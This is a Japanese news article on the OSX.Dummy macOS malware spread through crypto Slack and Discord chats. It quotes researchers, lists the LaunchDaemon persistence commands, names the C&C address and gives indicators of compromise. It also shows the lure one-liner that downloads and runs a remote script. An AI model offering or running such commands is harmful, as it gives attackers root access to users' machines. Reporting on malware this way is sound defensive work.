Macをターゲットとした新種のマルウェア「OSX.Dummy」が仮想通貨コミュニティ内で流行中。

スポンサーリンク

 Macをターゲットとした新しいマルウェア「OSX.Dummy」が仮想通貨コミュニティ内で流行しているそうです。詳細は以下から。

Slackアイコン

 米SANSのRemco VerhoefさんやObjective-SeeのPatrick Wardleさんらによると、現在SlackやDiscordの仮想通貨コミュニティチャット内で、ユーザーのMacに侵入し任意のコマンドを実行したり、個人情報を盗み出すマルウェア「OSX.Dummy」をダウンロードするスニペットが共有&流行しているそうです。

Previous days we’ve seen multiple MacOS malware attacks, originating within crypto related Slack or Discord chats groups by impersonating admins or key people. Small snippets are being shared, resulting in downloading and executing a malicious binary.

InfoSec Handlers Diary Blog – Crypto community target of MacOS malware

 Patrickさんによると、このOSX.Dummyマルウェアは以下のように署名されておらず、通常署名がない実行ファイルはmacOSのセキュリティ機能「Gatekeeper」によってブロックされますが、このマルウェアはユーザーがターミナルコマンドを通してダウンロード&実行するためGatekeeperに捕まらず実行され、

WhatsYourSignで確認されたOSX.Dummy

cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script
ユーザーはSlacksなどのコミュニティ内で実行するように求められるそうです。

ユーザーが管理者パスワードを要求後、パスワードが入力されるとダウンロードしたスクリプトを”/var/root”へ移動し、LaunchDaemonsやplistを作成、デーモンを起動、攻撃者のC&Cサーバーと接続を開始し接続が成功すれば、悪意のある攻撃者がRoot権限で任意のスクリプトを実行できるようになるそうです。

  • moving the script into /var/root
  • mv "/tmp/script.sh" "/var/root/"
  • dumping a plist file to /tmp/com.startup.plist and then moving into the LaunchDaemons directory
  • mv "/tmp/com.startup.plist" "/Library/LaunchDaemons/
  • setting the owner of the com.startup.plist plist to root
  • chown root "/Library/LaunchDaemons/com.startup.plist"
  • launching the com.startup.plist launch daemon
  • launchctl load "-w" "/Library/LaunchDaemons/com.startup.plist"

If the connection to the attacker’s C&C server (185.243.115.230:1337) succeeds, the attacker will be able to arbitrarily execute commands (as root!) on the infected system.

OSX.Dummy – Objective-See

スポンサーリンク

OSX.Dummyの検出

 OSX.Dummyは2018年06月29日時点で検出できるウィルス対策エンジンは0だったそうですが、現在ではESETやSymantec, Kaspersky, Sophos, Trend Microなど9つのセキュリティアプリが検出に対応しており、実行ファイルやC&Cサーバーも明らかになってきたので、気になる方は以下の情報をチェックしてみてください。

Indicators of Compromise

  • /var/root/script.sh
  • /Users/Shared/dumpdummy
  • /Library/LaunchDaemons/com.startup.plist
  • /tmp/script.sh
  • /tmp/com.startup.plist
  • /tmp/dumpdummy

コメント

  1. 匿名 より:

    ほんとMacのアンチウイルスソフトはいらねえと思うわ。
    どっかのギーク向け記事でも読んでから定義ファイル作ってんだろ。

:)